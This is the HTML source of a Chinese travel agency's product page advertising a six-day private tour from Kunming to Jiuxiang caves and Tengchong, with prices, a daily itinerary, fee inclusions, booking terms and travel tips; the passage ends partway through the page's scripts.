
<!DOCTYPE HTML>
<html>
<head>
    <meta charset="gbk">
    <title>云南人家,和顺古镇-深度云南--腾冲6日五星蜜月之旅_云游旅行网</title>
    <meta name="description" content="腾冲6日五星蜜月之旅_线路 云南旅游路线,云南旅游报价,云南旅游景点信息,云南旅游介绍,云南旅游资讯.0871-63166631" />
    <link href="http://xnxw.cncnimg.cn/css/front/base.css" rel="stylesheet" type="text/css" />
    <link href="http://xnxw.cncnimg.cn/css/front/templet2/home1.css?v=0317" rel="stylesheet" type="text/css" />
    <link rel="stylesheet" type="text/css" href="http://xnxw.cncnimg.cn/css/front/templet2/show1.css?v=20160519" />
    <link href="http://xnxw.cncnimg.cn/css/front/templet2/home1_color1.css?v=0317" rel="stylesheet" type="text/css" />
</head>
<!--[if lt IE 8]>
<script>var auto;</script>
<![endif]-->

<body style="background:#D5F2FA url(http://x1.cncnimg.cn/p10068/10/daf8.jpg) no-repeat center top">

<div class="warpper">

    <div id="site_nav">
        <div class="site_nav_bd">
            <div class="login"><em>欢迎来到云游旅行网 </em>   <a href="/member/login" rel="nofollow">登录</a>|<a href="/member/register" rel="nofollow">免费注册</a></div>
            <div class="quick_menu">
                <div class="top_ewm">
                    <a class="mobile"><img src="http://x1.cncnimg.cn/p10068/10068_code.jpg" /></a>
                </div>
                <em>旅行社业务经营许可证 <a href="/about" target="_blank">L-YN-CJ00009</a></em>
                <a href="/member/guester" rel="nofollow">订单查询</a>|
                <a href="/pay_order" rel="nofollow">快捷支付</a>|            <a href="javascript:;" onClick="addBookMark()" rel="nofollow">加入收藏</a>|
                <a href="/sitemap">网站导航</a>
            </div>
        </div>
    </div>
    <div class="header fn-clear">
        <div class="top">
            <div class="logo">
                <p><a href="/"><img src="http://x1.cncnimg.cn/p10068/374/4157.jpg" title="云游旅行网" /></a></p>
            </div>
            <div class="search">
                <div class="search_con"><form action="/search" target="_self" method="get"><input type="text" name="key" id="seach_input" class="search_txt" value="" /><input type="submit" value="搜索" class="search_sub" /></form></div>
                <p>
                    <em>热门搜索：</em>
                    <a href="/search/%C0%F6%BD%AD">丽江</a>
                    <a href="/search/%BD%CE%D7%D3%D1%A9%C9%BD">轿子雪山</a>
                    <a href="/search/%D4%C3%B4%BB%B6%C8%BC%D9%BE%C6%B5%EA">悦椿度假酒店</a>
                </p>
            </div>
            <div class="phone_top">
                <p class="space_line"><i></i>预定热线</p>
                <p><strong style="font-size:20px !important;">0871-63166631</strong></p>
            </div>

        </div>
        <div class="nav_layer">
            <div class="nav_layer_con">
                <ul>
                    <li ><a href="/"><span>首页<i ></i></span></a></li>
                    <li ><a href="/hotel"><span>度假酒店<i ></i></span></a></li>
                    <li ><a href="/qianzheng"><span>签证<i ></i></span></a></li>
                    <li ><a href="/ticket"><span>门票<i ></i></span></a></li>
                    <li ><a href="/line/zhoubianyou"><span>昆明出发周边游<i ></i></span></a></li>
                    <li ><a href="/chujing"><span>出境游<i ></i></span></a></li>
                    <li ><a href="/guonei"><span>国内游<i ></i></span></a></li>
                    <li ><a href="/line/yunnantour"><span>云南参团游<i ></i></span></a></li>
                    <li ><a href="/zt"><span>旅游专题<i ></i></span></a></li>
                    <li ><a href="/diy"><span>定制您的旅行<i ></i></span></a></li>
                </ul>
            </div>
        </div>
    </div>
    <script src="http://xnxw.cncnimg.cn/js/jquery1.10.2.min.js"></script>
    <script src="http://xnxw.cncnimg.cn/js/front/base.js"></script>
    <script type="text/javascript">
        $(function(){
            $('.J_ercode').mouseover(function(){
                $(this).find('.J_code_img').show();
            });
            $('.J_ercode').mouseout(function(){
                $(this).find('.J_code_img').hide();
            });
        });
    </script>

    <script src="http://xnxw.cncnimg.cn/js/line.js" type="text/javascript"></script>
    <script src="http://xnxw.cncnimg.cn/js/zixun.js" type="text/javascript"></script>
    <body>
    <style>
        #line_tip span {
            display: inline-block;width: 48%;
        }
        .clearfix:after {
            display: block;
            content: '\200B';
            clear: both;
            height: 0;
        }
    </style>
    <style type="text/css">
        /* 效果CSS开始 */
        div.jd_detail{
            position:relative;
            width:755px;
            margin:5px;/*设置元素跟其他元素的距离为5像素*/
        }
        div.jd_img {
            width:200px;
            margin:1px;/*设置元素跟其他元素的距离为1像素*/
            float:left;
            /*background:#900;*/
        }
        div.jd_title {
            width:550px;
            margin:1px;/*设置元素跟其他元素的距离为1像素*/
            float:right;/*设置浮动，实现多列效果，div+Css布局中很重要的*/
            /*background:#90C;*/
        }
        div.jd_jianjie_img {
            width:750px;
            font-size: 13px;
            margin:1px;/*设置元素跟其他元素的距离为1像素*/
            float: left;
            /*background-color: #00b834;*/
        }
        div.jd_jianjie_text {
            width:750px;
            font-size: 13px;
            margin:1px;/*设置元素跟其他元素的距离为1像素*/
            float: left;
            /*background-color: #00b834;*/
        }
        .Clear{
            clear:both;
        }

    </style>

    <div class="ndwz">
        <span>您的位置：</span><a href="/">首页</a><em>&gt;</em><a href="/line/viptour" target="_blank">VIP小包团</a><em>&gt;</em>线路详情
    </div>
    <input type="hidden" id="uid" value="0">
    <input type="hidden" id="sale_member" value="0">
    <div class="main fn-clear">

        <div class="top_box full">
            <div class="bianhao">编号：Y502</div>
            <h1><strong>&lt;独立包团&gt;</strong>深度云南-腾冲6日五星度假之旅<img src="http://xnxw.cncnimg.cn/images/cp/ico_pay18x18.gif" title="支付宝"></h1>
            <div class="top_lft">
                <div class="pic">
                    <a href="http://x1.cncnimg.cn/p10068/10/b75f.jpg!m2" target="_blank" title="深度云南-腾冲6日五星度假之旅"><img src="http://x1.cncnimg.cn/p10068/10/b75f.jpg!m2" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg'; this.onerror=null;"  width="450" height="300" alt="深度云南-腾冲6日五星度假之旅"></a>
                </div>
                <div class="share_box">
                    <div class="scxl"><a href="/member/fav/43610/?typeid=2" target="_self" rel="nofollow" >收藏</a></div>
                    <div class="print"><a href="/line/print_detail/43610" target="_blank" rel="nofollow" ><img src="http://xnxw.cncnimg.cn/images/front/print.gif">打印</a></div>
                    <div class="bdsharebuttonbox">
                        <a href="#" class="bds_more" data-cmd="more"></a>
                        <a title="分享到QQ空间" href="#" class="bds_qzone" data-cmd="qzone"></a>
                        <a title="分享到新浪微博" href="#" class="bds_tsina" data-cmd="tsina"></a>
                        <a title="分享到腾讯微博" href="#" class="bds_tqq" data-cmd="tqq"></a>
                        <a title="分享到人人网" href="#" class="bds_renren" data-cmd="renren"></a>
                        <a title="分享到微信" href="#" class="bds_weixin" data-cmd="weixin"></a>
                    </div>

                </div>
                <div>
                    <span class="tip"><span>1727</span>位游客关注&nbsp;&nbsp;&nbsp;&nbsp;最近预订数<em>0</em></span>
                </div>
                <div class="pic_bottom">
                    <div class="mobile_con">
                        <span><i class="i5"></i>立即穿越到手机</span>
                        <div class="hide_box">
                            <div class="bg">
                                <img src="/static/uploads/p10068/qrcode/line/bb86206beda31d17dd972cd3a3f4ba6b.png" width="110" height="110" alt="扫描二维码，随时随地看线路">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="top_rht">
                <div class="txt">
                    <ul>
                        <li><dfn>门 市 价：</dfn><del id="price">&yen;4480</del></li>                                                                    <li class="price" style="width:100% !important;"><dfn>优 惠 价：</dfn><em>&yen;<b id="price_cncn">4380</b></em>起
                        &nbsp;儿童价：<em>&yen;<b id="price_cncn_child">1380</b></em>起

                        <span class = "price_tooltip">起价说明</span>
                        <div class = "tooltip_con">
                            <div class = "inline_border">
                                <i class = "arrow"></i>
                                <div class = "item"><strong>1.本起价是从所有可选出发日期中选出的最低单人价格，</strong>实际产品价格会根据您所选择的出发日期、出行人数、服务标准、入住酒店房型、航班或交通以及所选附加服务的不同而有所差别；</div>
                                <div class = "item"><span class = "orange">2.最终预订价格，以旅行社确认后为准</span></div>
                                <div class = "item">3.若出行中有(儿童、老人、学生、军人、伤残人士)等特殊人群，可先在线提交订单，客服会联系您确认相关优惠政策；</div>
                                <div class = "item">4.若发现产品虚假报价，您可以举报，一经核实会及时删除该产品！</div>
                            </div></li>
                        <li><dfn>发团日期：</dfn>天天发团，请提前<strong>5</strong>天报名</li>
                        <li><dfn>出发城市：</dfn><a href="/search/昆明">昆明</a>                        </li>
                        <li><dfn>行程天数：</dfn>6天</li>
                        <li><dfn>交通方式：</dfn>汽车去汽车回</li>
                    </ul>
                </div>

                <div class="key">
                    <dl class="h40">
                        <dt><span>套餐类型</span>：</dt>
                        <dd>
                            <ul id="price_type">

                                <li  id="li_date_type_91469" htmlfor="91469"><a href="javascript:line.date_type('91469','2017-08-12','4480','4380','1380','8—10人独立包','-1');" target="_self" title="">8—10人独立包</a></li>
                                <li  id="li_date_type_91458" htmlfor="91458"><a href="javascript:line.date_type('91458','2017-08-12','4680','4580','1380','4—6人独立包团','-1');" target="_self" title="4-6人独立包团
费用包含：
住 宿：全程五星级酒店双人间住宿，以及酒店内早餐；
用 餐：全程正餐自理；
交 通：昆明/腾冲往返机票（机票按7折核算）、机场建设费、燃油附加费、云南境内空调旅游汽车，专业司机；
导 游：云南境内中文导游服务；
门 票：所列行程首道景点门票；
购 物：纯玩无购物。

费用不含：
1、洗衣、理发、电话、饮料、烟酒、付费电视、行李搬运等私人费用；
2、自费项目；
3、超重行李的托运费、管理费等；
4、行程中未提到的其它费用：如特殊门票、游船（轮）、缆车、地铁票等费用；
5、以上所含服务中所未提及的任何费用。">4—6人独立包团</a></li>
                            </ul>
                        </dd>
                        <dd style="margin: 10px 0 0 71px;color: rgb(255, 85, 34); line-height: 1.5;display: none" class="select_type_first">请先选择套餐类型！</dd>
                    </dl>


                    <dl>
                        <dt>出发日期：</dt>
                        <dd>
                            <input id="start_time" name="start_time" type="text" class="text text110 riqi" value="" placeholder="请选择出发日期" readonly="readyonly" title="点击选择出发日期">
                        </dd>
                        <dd style="margin: 10px 0 0 71px;color: rgb(255, 85, 34); line-height: 1.5;display: none"  class="select_date_first">请先选择出发日期！</dd>
                    </dl>
                    <dl id="calendar" style="display:none"><b onClick="line.close_calendar();" id="cal_hide">隐藏</b></dl>
                    <dl>
                        <dt style="display:none">人数：</dt>
                        <dd style="display:none">
                            <form id="line_order"  method="post">
                                <input id="line_id" name="line_id" type="hidden" value="43610">
                                <input id="type_id" name="type_id" type="hidden" value="91469">
                                <input id="date" name="date" type="hidden" value="2017-08-12">
                                <input id="discount" type="hidden" value="0">
                                <input name="adult_num" id="adult_num" type="text" value="1" class="text text30" > 成人<span></span>&nbsp;&nbsp;
                                <input name="child_num" id="child_num" type="text" value="0" class="text text30"> 儿童<span></span>
                                <span style="display:none">库存 <em id="stock">-1</em></span>
                            </form>
                        </dd>
                    </dl>
                    <div class="button">
                        <!--<span id="stock_explan" style="display:none"></span>-->
                        <span style="width:125px; height:36px;">
                        <input name="imageField" type="image" src="http://xnxw.cncnimg.cn/images/front/home/btn_order.png" alt="立刻预订" onClick="line.order()">
                    </span>

                        <s class="tel"><var>或直接拨打</var><em title="0871-63166631">0871-63166631</em>咨询/预订</s>
                        <div id="orange">已选择了“<em id="select_typename">8—10人独立包</em>”<em id="from_date"></em></div>
                    </div>
                </div>
            </div>
        </div>
        <div class="lft">
            <div class="f_prompt">
                <div class="f_block_bg"></div>
                <div class="f_prompt_cont">
                    <div class="f_title">系统提示</div>
                    <p class="f_prompt_ph">该产品需要登录才能预订</p>
                    <a class="f_sign_in" href="javascript:window.location.href='/member/login?ref='+window.location.pathname;" title="登录">立即登录</a>
                    <a class="f_chat_master" href="/member/register" title="注册">马上注册</a>
                    <a class="f_close_btn" href="javascript:void(null);" title="关闭弹窗"></a>
                </div>
            </div>
            <div class="box790">
                <div class="tag_top" id="js_tag_top">
                    <a href="#?" class="on" id="xingcheng"><i></i>线路行程</a>
                    <a href="#?" id="explain"><i></i>费用说明</a>
                    <a href="#?" id="fee"><i></i>预定指南</a>
                    <a href="#?" id="review"><i></i>游客点评</a>                    <a href="#?" id="zixun"><i></i>在线咨询</a>
                </div>
                <div class="tag_con" id="content">
                    <div id="content_xingcheng">
                        <div class="tese">
                            <strong>产品特色推荐</strong>
                            <div class="nr J_editor_show" class=""><i></i>
                                <p>◎云南高品质度假线路；<br />
                                    ◎全程五星级酒店住宿，云南省内共两程飞机。昆明-腾冲直飞往返飞机，省却旅途劳顿；<br />
                                    ◎特别安排充分时间游览央视评选的中国十大魅力名镇之首--和顺侨乡古镇，和昆明鬼斧神工的神奇溶洞--九乡，让您避开人流，领略一般团队难以享受到的景色；<br />
                                    ◎特别赠送豪华火山温泉洗浴，在洗去一身的尘埃同时，放松全身的每一处细胞；<br />
                                    ◎随餐安排腾冲风味餐，让您全方位的体味异域民族风情。<br /></p>
                            </div>

                        </div>
                        <br />
                        <div class="stroke_day">
                            <div class="title">
                                <em>第1天</em>出发城市-昆明
                            </div>
                            <div class="stroke_con">
                                <div class="type">
                                    <span>用餐早餐：√</span><span>午餐：敬请自理</span><span>晚餐：敬请自理</span><span>住宿：昆明震庄迎宾馆</span>
                                </div>
                                <p class="J_editor_show">乘机前往春城昆明，鲜花接机，体验春城的气息；入住酒店休息，调整身心，准备迎接未来几天的精彩行程。</p>
                                <div class="pic">
                                </div>
                            </div>
                        </div>
                        <div class="stroke_day">
                            <div class="title">
                                <em>第2天</em>昆明-宜良九乡-昆明
                            </div>
                            <div class="stroke_con">
                                <div class="type">
                                    <span>用餐早餐：√</span><span>午餐：敬请自理</span><span>晚餐：敬请自理</span><span>住宿：昆明震庄迎宾馆</span>
                                </div>
                                <p class="J_editor_show">早餐后，游览大自然鬼斧神工的杰作—【九乡溶洞】（车程大约2.5小时，预计游览2小时），景区位于彝族先民世居之地，有着悠久的民族传统和浓郁的民族风情，九乡以溶洞景观为主，将自然、人文、民族景观融为一体，泛舟于暗河溶洞之上，两旁山石峭立，瀑布溅流，充分领略大自然的恬静和神韵，溶洞内钟乳石林立，让您体味大自然造物的神奇。晚餐前往“云南人家”，享用歌舞伴宴，得到味觉和视觉的双重享受。</p>
                                <div class="pic">
                                    <img src="http://x1.cncnimg.cn/p10068/10/7c4e.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                    <img src="http://x1.cncnimg.cn/p10068/10/cf20.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                </div>
                            </div>
                        </div>
                        <div class="stroke_day">
                            <div class="title">
                                <em>第3天</em>昆明直飞腾冲
                            </div>
                            <div class="stroke_con">
                                <div class="type">
                                    <span>用餐早餐：敬请自理</span><span>午餐：敬请自理</span><span>晚餐：敬请自理</span><span>住宿：腾冲世纪金源</span>
                                </div>
                                <p class="J_editor_show">关上手机，睡到自然醒，感受春城特有的阳光！由昆明乘机直飞腾冲。前往观赏声威俱壮的【热海公园】（预计1小时）最有特色的夜景，景区位于山口，一边是冷却了的熔岩，另一边却是沸腾不止的地热，神奇的自然现象同时显现，只要您一走进这里，就能听到沸腾的声音。夜晚的热海，莹莹灯光和闪闪星光时隐时现，相互辉映，漫步在热海的雾气缭绕之中，更是让人宛如腾云驾雾，恍如仙境。而这里最有特色的当数“大滚锅”直径达3米，深1.5米，水温更是高达90度以上，昼夜翻滚沸腾，四季热气蒸腾。此外，还有蛤蟆嘴、珍珠泉、怀胎井等众多奇特的景致。</p>
                                <div class="pic">
                                    <img src="http://x1.cncnimg.cn/p10068/10/649c.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                    <img src="http://x1.cncnimg.cn/p10068/10/88df.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                </div>
                            </div>
                        </div>
                        <div class="stroke_day">
                            <div class="title">
                                <em>第4天</em>腾冲
                            </div>
                            <div class="stroke_con">
                                <div class="type">
                                    <span>用餐早餐：√</span><span>午餐：敬请自理</span><span>晚餐：敬请自理</span><span>住宿：腾冲世纪金源</span>
                                </div>
                                <p class="J_editor_show">游览4A级腾冲【火山群国家公园】：火山博物馆、大空山、小空山、观赏大自然鬼斧神工造就的地理奇观—柱状节理、黑鱼河等（往返约50公里，车程30分钟，游览时间约150分钟，自理电瓶车10元/人）。游腾越文化广场观赏高黎贡山母亲像（游览约20分钟）、游全国唯一的城市瀑布—【叠水河瀑布】（游览约40分钟）；游览当年中国远征军腾冲收复战阵亡烈士陵园—【国殇墓园】（游览约40分钟）。</p>
                                <div class="pic">
                                    <img src="http://x1.cncnimg.cn/p10068/10/fac6.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                    <img src="http://x1.cncnimg.cn/p10068/10/f531.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                </div>
                            </div>
                        </div>
                        <div class="stroke_day">
                            <div class="title">
                                <em>第5天</em>腾冲
                            </div>
                            <div class="stroke_con">
                                <div class="type">
                                    <span>用餐早餐：√</span><span>午餐：敬请自理</span><span>晚餐：敬请自理</span><span>住宿：腾冲世纪金源</span>
                                </div>
                                <p class="J_editor_show">早餐后，走近著名主持人崔永元代言的【和顺侨乡】（预计2小时）－央视评选的中国十大魅力古镇之首。古镇之名源于“云涌吉详，风吹和顺”，周围五山环抱，人杰地灵，乡间古朴的建筑比比皆是，就像一颗璀璨明珠点缀在西南的丝绸之路上；下午，我们将再次来到【热海公园】，享用我们为您特别安排的价值168元/人的火山温泉，放松您全身的每一处细胞，润肤驱疾，延年益寿，一解接连几日旅途的劳顿（虽然这里的配套设施相当完善，不过还请您自备泳衣，当地价格较高）。</p>
                                <div class="pic">
                                    <img src="http://x1.cncnimg.cn/p10068/10/7844.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                    <img src="http://x1.cncnimg.cn/p10068/10/ec1f.jpg" onerror="this.src='http://xnxw.cncnimg.cn/images/front/nopic_m.jpg';this.onerror=null;">
                                </div>
                            </div>
                        </div>
                        <div class="stroke_day">
                            <div class="title">
                                <em>第6天</em>腾冲直飞昆明，可当天转机离开
                            </div>
                            <div class="stroke_con">
                                <div class="type">
                                    <span>用餐早餐：√</span><span>午餐：敬请自理</span><span>晚餐：敬请自理</span><span>住宿：</span>
                                </div>
                                <p class="J_editor_show">腾冲乘飞机前往昆明，根据航班时间前往昆明鲜花市场自由购物，当天可乘飞机返回出发地，结束愉快的滇西北火山热海度假行程！</p>
                                <div class="pic">
                                </div>
                            </div>
                        </div>
                    </div>

                    <div id="content_explain">
                        <div class="cost">
                            <h4>费用说明</h4>
                            <strong>8—10人独立包</strong>
                            <p class="J_editor_show"></p>
                            <strong>4—6人独立包团</strong>
                            <p class="J_editor_show">4-6人独立包团<br />
                                费用包含：<br />
                                住 宿：全程五星级酒店双人间住宿，以及酒店内早餐；<br />
                                用 餐：全程正餐自理；<br />
                                交 通：昆明/腾冲往返机票（机票按7折核算）、机场建设费、燃油附加费、云南境内空调旅游汽车，专业司机；<br />
                                导 游：云南境内中文导游服务；<br />
                                门 票：所列行程首道景点门票；<br />
                                购 物：纯玩无购物。<br />
                                <br />
                                费用不含：<br />
                                1、洗衣、理发、电话、饮料、烟酒、付费电视、行李搬运等私人费用；<br />
                                2、自费项目；<br />
                                3、超重行李的托运费、管理费等；<br />
                                4、行程中未提到的其它费用：如特殊门票、游船（轮）、缆车、地铁票等费用；<br />
                                5、以上所含服务中所未提及的任何费用。</p>
                        </div>
                    </div>
                    <div id="content_fee">
                        <div class="cost">
                            <h4>预定指南</h4>
                            <p class="J_editor_show">交　　通：（1）合同一经签订且付全款，团队机票、列车票、船票即为出票，不得更改、签转、退票。<br />
                                （2）飞行时间、车程时间、船程时间以当日实际所用时间为准。<br />
                                团队用餐：十人一桌，八菜一汤，人数不足十人时，在每人用餐标准不变的前提下调整餐食的分量。<br />
                                游　　览：（1）景点游览、自由活动、购物店停留的时间以当天实际游览为准。（2）行程中需自理门票和当地导游推荐项目，请自愿选择参加。<br />
                                （3）请您仔细阅读本行程，根据自身条件选择适合自己的旅游线路，出游过程中，如因身体健康等自身原因需放弃部分行程的，或游客要求放弃部分住宿、交通的，均视为自愿放弃，已发生费用不予退还，放弃行程期间的人身安全由旅游者自行负责。<br />
                                （4）团队游览中不允许擅自离团（自由活动除外），中途离团视同游客违约，按照合同总金额的20%赔付旅行社，由此造成未参加行程内景点、用餐、房、车等费用不退，旅行社亦不承担游客离团时发生意外的责任。<br />
                                （5）如遇台风、暴雪等不可抗因素导致无法按约定行程游览，行程变更后增加或减少的费用按旅行社团队操作实际发生的费用结算。<br />
                                （6）出游过程中，如产生退费情况，以退费项目旅行社折扣价为依据，均不以挂牌价为准。<br />
                                购　　物：当地购物时请慎重考虑，把握好质量与价格，务必索要发票。<br />
                                <br />
                                差价说明：<br />
                                （1）如遇国家政策性调整门票、交通价格等，按调整后的实际价格结算。<br />
                                （2）赠送项目因航班、天气等不可抗因素导致不能赠送的，费用不退。<br />
                                （3）云南当地景点实行套票制，如持优待证件（如老年证、军官证、教师证等）或没有游览完行程景点，产生差价不退。<br />
                                意见反馈：请配合导游如实填写当地的意见单，不填或虚填者归来后投诉将无法受理。</p>                                                <p class="J_editor_show">1、建议您在出发前投保“旅游意外保险”；<br />
                            2、旅游期间，景点游客较多，请您注意安全，贵重物品请随身携带；<br />
                            3、旅游期间，请您注意饮食卫生；<br />
                            4、出发前，请您留意目的地的天气预报，携带有关衣物和常用药品（雨伞、防晒霜、晕车药、感冒药等）；<br />
                            5、请备足相机内存卡，以免留下遗憾。<br />
                            6、切记不要随意听从摩的或出租车师傅给您提供的娱乐信息；<br />
                            7、切记不要单独包车，尤其摩托车，建议多找几位同行者，一同包合法的车去各景区游览；<br />
                            8、当地各民族都有自己别具特色的称谓，具体如下：石林：男：阿黑哥，女：阿诗玛；另外，整个云南境内，无论民族，都极其反感“小姐”这个称谓，如果需要，请用“小姑娘”代替；<br />
                            9、云南饮食与北京风味有较大差异，可能不合您的口味，请做好心理准备；当地水土为弱酸性，建议多饮茶水，以中和酸碱；<br />
                            10、云南少数民族众多，许多民族民风彪焊，请您尽量不要与当地人发生矛盾，避免不必要的争执和不快；<br />
                            11、云南寺庙众多，您在游历寺庙时有四大忌讳需牢记心头，以免不必要的争执与不快： A. 与僧人见面常见的行礼方式为双手合十，微微低头，或者单手树掌于胸前、头略低，忌握手、拥抱、 抚摸僧人头部等不当礼节； B. 在寺庙中不得吸烟、随地乱扔垃圾、大声喧哗、指点议论、随便走动； C. 在大殿中切记不要拍照、摄影、乱摸乱刻神像，踩踏大殿门槛； D. 如遇佛事活动应静立默视或悄然离开。同时，要照看好自己的孩子，以免其因无知而做出不礼貌的行为；<br />
                            12、云南特产为玉器、茶叶、烟草等，但质量参差不齐，请到旅游局指定正规单位购买，并索要购买单据；<br />
                            13、云南为旅游胜地，游客较多，许多景点不走回头路，因此，请您务必跟紧导游，切勿擅自离队，并请严格遵守集合时间。另外，个别景点，如玉龙雪山索道，会出现排队等候情况，请您见谅；<br />
                            14、云南地处边陲，个别地区设施与首都北京相比存在差距，请您见谅并作好心理准备。旅游是一件“吃苦、受累、外加消费”的活动，请您调整心态，将身心投入美伦美幻的景色和那多彩的民族风情中。</p>                    </div>
                    </div>



                    <div id="content_review">
                        <div class="review">
                            <h4>游客评价</h4>
                            <div id="comment_main">
                                <div class="review_top">
                                    暂无评论
                                </div>
                            </div>
                        </div>



                        <script>
                            $.myPlugin.tag("#js_tag1_top","#js_tag1_con","on",3);
                        </script>
                    </div>

                    <div id="content_zixun">
                        <div class="message">
                            <h4>在线咨询</h4>
                            <div class="message_con">
                                <dl id="message">
                                    <dt><em>2014-06-18</em><p><i></i>游客：两个小孩一个11岁一个2岁怎么收费？两个大人和两个小孩能住一间房吗？</p></dt>
                                    <dd><em>2014-06-18</em><p><i></i>客服：您好，11岁的小孩如果身高超过1.3米，单独占一个床位的话价格跟成人是一样的，2岁的话只收车位费，2个成人和两个小孩可以住一个房间，但是估计有点挤！详细报价请给我您们出行的日期之后才能报价，感谢您的关注！云游左兴齐0871-63532143！  </p></dd>
                                </dl>
                            </div>
                            <div class="message_form mt10" id="zixun">
                                <s></s>
                                <strong>我要咨询</strong>
                                <div class="user_login"><em>默认以匿名提交，<a target="_self" href="/member/login">会员请登录</a></em></div>
                                <span style="display:none" id="login_dis"><p class="login">用户名：<input name="username" type="text" class="text text60"> 密码：<input name="password" type="password" class="text text60" autocomplete="off"></p></span>
                                <p><textarea class="textarea" id="zixun_content" name="content"></textarea></p>
                                <p class="h30">联系方式：<select name="contact_method" id="contact_method">
                                    <option value="1">手机/电话</option>
                                    <option value="2">邮箱</option>
                                    <option value="3">QQ</option>
                                    <option value="4">其它</option></select>
                                    <input id="contact" class="text" name="contact"></p>
                                <p class="h30">验 证 码：<input id="checkcode" type="text" class="text text40" maxlength="4" onClick="zixun.showcode();">
                                    <span id="code_verify"></span><span id="code_text" style="color:#f73" onClick="zixun.showcode();">点击获取验证码</span></p>
                                <p class="button"><input type="button" class="submit" id="pub_zixun" onClick="zixun.pub_zixun('line','43610')" value="提交咨询"></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="rht">
            <div class="promise">
                <strong>服务承诺</strong>
                <p><i class="i0"></i>全程价格透明 明白消费</p>
                <p><i class="i1"></i>精心筛选行程 品质享受</p>
                <p><i class="i2"></i>绝无强制消费 正规服务</p>
                <p><i class="i3"></i>品牌质量保证 支付安全</p>
            </div>

            <div class="box200">
                <div class="tit"><strong>我浏览过的产品</strong></div>
                <div class="txt2">
                    <ul>
                    </ul>
                </div>
            </div>

        </div>
    </div>
    <div class="aim mt10">
        <div class="tit">
        <span class="right more">
                       <a href="/line/viptour">VIP小包团</a>
                       <a href="/line/yndujia">云南度假</a>
                       <a href="/line/tengchonglvyou">腾冲</a>
                   </span>
            <strong>相关产品推荐</strong>
        </div>
        <div class="txt">
            <ul>
                <li>
                    <a href="/line/44784.htm"  target="_blank" title="&lt;腾冲参团&gt;腾冲一地4日游"><img src="http://x1.cncnimg.cn/p10068/12/866a.jpg!m" width="160" height="107" alt="&lt;腾冲参团&gt;腾冲一地4日游"></a>
                    <p><a target="_blank" href="/line/44784.htm" title="">&lt;腾冲参团&gt;腾冲一地4日游</a></p>
                    <span><em>980</em>元起</span>
                </li>
                <li>
                    <a href="/line/291455.htm"  target="_blank" title="昆明-大理-腾冲-瑞丽5日游"><img src="http://xnxw.cncnimg.cn/images/front/nopic_m.jpg" width="160" height="107" alt="昆明-大理-腾冲-瑞丽5日游"></a>
                    <p><a target="_blank" href="/line/291455.htm" title="">昆明-大理-腾冲-瑞丽5日游</a></p>
                    <span><em>1050</em>元起</span>
                </li>
            </ul>
        </div>
    </div>

    <script src="http://xnxw.cncnimg.cn/js/cp/jquery1.10.2.js"></script>
    <script src="http://xnxw.cncnimg.cn/js/cp/jquery-migrate1.2.1.js"></script>
    <script type="text/javascript">
        var jQuery_1_10_2 = $.noConflict(true);
    </script>
    <script src="http://xnxw.cncnimg.cn/js/cp/editor.js"></script>

    <script>
        $('.J_editor_show').each(function(){
            var self = $(this);
            var html = self.html();
            self.html(Editor_cncn.prototype.contentDecode(html,true));
        });
        $(".price_tooltip").hover(function(){
            var top = $(this).position().top + 23;
            var left = $(this).position().left - 100;
            $(".tooltip_con").css({
                "top":top,
                "left":left
            });
            $(".tooltip_con").show();
        },function(){
            $(".tooltip_con").hide();
        });
        $(".tooltip_con").hover(function(){
            $(this).show();
        },function(){
            $(this).hide();
        });
        //    $("li.jd_jingdian").hover(function(){
        //        $(this).find("div.jd_jianjie").show();
        ////        alert("1+1=1");
        //
        //    },function(){
        //        $(this).find("div.jd_jianjie").hide();
        //
        //    });
        $("a.show_jd_detail").click(function () {
            var a = $(this).attr("div_value");
            $(".jd_jianjie_img").hide();
            $("#jd_" + a).toggle("normal");
        })

        jd = {
            show_img: function (jd_id) {
                $(".jd_jianjie_text").hide();
                $("#show_jd_img_"+jd_id).toggle("normal");

                jQuery.ajax({
                    type: "POST",
                    url: '/line/ajax_jd_img/' + jd_id,
                    data: {},
                    dataType: 'json',
                    success: function (data) {
//                    console.log(data);
                        var html = "<div class='txt'> <ul>";
                        for(var i=0;i<data.arr_size;i++) {
                            if(i%3==0) {
                                html +="</ul><ul>";
                            }
                            html += "<li><img width='180' height='108' alt='"+data.img[i]+"' src='"+data.img[i]+"' /><span>"+(i+1)+"</span></li>";
                        }
                        html +="</ul></div><div class=\"clear\"></div>";
                        jQuery("#show_jd_img_"+jd_id).html(html);
                        var scrollTop = $('body').scrollTop();
                        scrollTop = scrollTop - 36;
                        $('body').scrollTop(scrollTop);
                    },
                    error: function () {
//                    console.log("something wrong!");
                    }
                });
            }
        }
    </script>


    <script>
        window._bd_share_config={
            "common":{
                "bdSnsKey":{},
                "bdText":"",
                "bdMini":"2",
                "bdMiniList":false,
                "bdPic":"",
                "bdStyle":"0",
                "bdSize":"16"},
            "share":{},
            "image":{
                "viewList":["qzone","tsina","tqq","renren","weixin"],
                "viewText":"分享到：",
                "viewSize":"16"},
            "selectShare":{
                "bdContainerClass":null,
                "bdSelectMiniList":["qzone","tsina","tqq","renren","weixin"]}
        };with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>

    <script id="bdshell_js"></script>
    <script>
        var bds_config = { 'bdPic':'http://x1.cncnimg.cn/p10068/10/b75f.jpg!m2' };
        document.getElementById("bdshell_js").src = "http://share.baidu.com/static/js/shell_v2.js?t=" + new Date().getHours();

        // 关闭登录弹窗
        $('.f_prompt .f_close_btn, .f_prompt .f_block_bg').click(function() {
            $('.f_prompt').css('display', 'none');
